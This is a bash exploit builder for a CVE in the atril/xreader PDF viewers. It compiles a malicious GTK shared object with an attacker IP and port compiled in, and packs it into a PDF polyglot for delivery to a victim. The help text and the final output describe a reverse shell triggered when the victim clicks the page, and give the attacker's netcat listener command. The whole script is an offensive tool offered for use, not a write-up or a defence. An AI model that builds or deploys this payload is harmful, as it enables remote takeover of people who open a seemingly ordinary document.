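#!/usr/bin/env bash
#
# exploit.sh — one-shot builder for the atril/xreader CVE-2026-46529 polyglot.
#
# Compiles evil.so with the IP/port you want, runs the polyglot builder,
# outputs the PDF ready to deploy. The compiled .so is removed at the
# end unless --keep-so.
#
# Environment: CC  - C compiler to use (optional; --cc overrides it).
# Files expected next to this script: evil_gtk_module.c, build_polyglot.py.
#
# Usage:
#   ./exploit.sh -o report.pdf --ip 192.168.1.5 --port 4444
#   ./exploit.sh -h
#
set -euo pipefail

IP="127.0.0.1"
PORT="9000"
OUTPUT="polyglot.pdf"
SO="evil.so"
CC="${CC:-gcc}"
KEEP_SO=false

#######################################
# Print the help text.
# Globals:   none
# Arguments: none
# Outputs:   usage text on stdout
#######################################
usage() {
  cat <<'EOF'
Usage: ./exploit.sh [options]

Options:
  -o, --output FILE   Output PDF path (default: polyglot.pdf)
                      The polyglot expects to be deployed on the victim with
                      the SAME BASENAME as this file. The directory does NOT
                      matter — atril resolves the path at runtime.
      --ip IP         Reverse shell target IP (default: 127.0.0.1)
      --port PORT     Reverse shell target port (default: 9000)
      --cc COMPILER   C compiler (default: gcc, env: CC)
      --keep-so       Don't delete evil.so after build
  -h, --help          Show this message

Examples:
  ./exploit.sh -o report.pdf --ip 192.168.1.5 --port 4444
  CC=aarch64-linux-gnu-gcc ./exploit.sh -o x.pdf --ip 10.0.0.1

After build:
  Attacker: nc -lvnp
  Victim:   atril /any/where/   (click anywhere on the page → shell back)
EOF
}

#######################################
# Report a usage error on stderr and exit with status 1.
# Arguments: $* - error message
# Outputs:   message followed by the usage text, both on stderr
#######################################
die_usage() {
  printf '%s\n' "$*" >&2
  usage >&2
  exit 1
}

#######################################
# Check that an option which takes a value actually received one.
# Called as `require_value "$@"` from the parse loop, so $1 is the option
# and $2 (if present) is its value. Without this, `--ip` given as the
# last argument trips `set -u` with an "unbound variable" error instead
# of a readable message.
# Arguments: "$@" - the remaining command line, option first
# Returns:   0 if a value is present; exits via die_usage otherwise
#######################################
require_value() {
  [[ $# -ge 2 ]] || die_usage "Option $1 requires an argument"
}

while [[ $# -gt 0 ]]; do
  case "$1" in
    -o|--output) require_value "$@"; OUTPUT="$2"; shift 2 ;;
    --ip)        require_value "$@"; IP="$2";     shift 2 ;;
    --port)      require_value "$@"; PORT="$2";   shift 2 ;;
    --cc)        require_value "$@"; CC="$2";     shift 2 ;;
    --keep-so)   KEEP_SO=true; shift ;;
    -h|--help)   usage; exit 0 ;;
    *)           die_usage "Unknown option: $1" ;;
  esac
done

# Basename the polyglot expects on victim disk is derived from the
# output filename. If you need them to differ, rename the file after build.
NAME="$(basename -- "$OUTPUT")"

# The build steps below run from the script's own directory. Anchor a
# relative -o path to the caller's cwd first, so `-o report.pdf` lands
# where the caller is, not next to the sources.
case "$OUTPUT" in
  /*) ;;
  *)  OUTPUT="$PWD/$OUTPUT" ;;
esac

if [[ "$(uname)" == "Darwin" ]]; then
  printf '%s\n' \
    "[!] macOS detected. Apple's ld doesn't accept GNU build-id flags." \
    "    Compile on a Linux host (or via Docker / cross-compiler)." >&2
  exit 1
fi

cd "$(dirname -- "$0")"

# Fail early with a clear message rather than a compiler or Python traceback.
for src in evil_gtk_module.c build_polyglot.py; do
  if [[ ! -f "$src" ]]; then
    printf '[!] missing %s in %s\n' "$src" "$PWD" >&2
    exit 1
  fi
done

printf '[*] compiling %s (CC=%s, IP=%s, PORT=%s)\n' "$SO" "$CC" "$IP" "$PORT"
# ATTACKER_IP / ATTACKER_PORT reach the C source as string literals, hence
# the escaped inner quotes. --build-id=sha1 is a GNU ld option, which is
# why macOS (Apple ld) is rejected above.
"$CC" -shared -fPIC -Wl,--build-id=sha1 \
  -DATTACKER_IP="\"$IP\"" \
  -DATTACKER_PORT="\"$PORT\"" \
  -o "$SO" evil_gtk_module.c

printf '[*] building polyglot %s (basename embedded: %s)\n' "$OUTPUT" "$NAME"
python3 build_polyglot.py "$SO" "$OUTPUT"

# Only reached on success (set -e); a failed build deliberately leaves
# the .so behind for inspection.
if [[ "$KEEP_SO" != true ]]; then
  rm -f -- "$SO"
  printf '[+] cleaned up %s (use --keep-so to retain)\n' "$SO"
fi

printf '\n'
printf '[+] polyglot ready: %s\n' "$OUTPUT"
printf '    deploy to victim with basename: %s\n' "$NAME"
printf '    attacker listener: nc -lvnp %s\n' "$PORT"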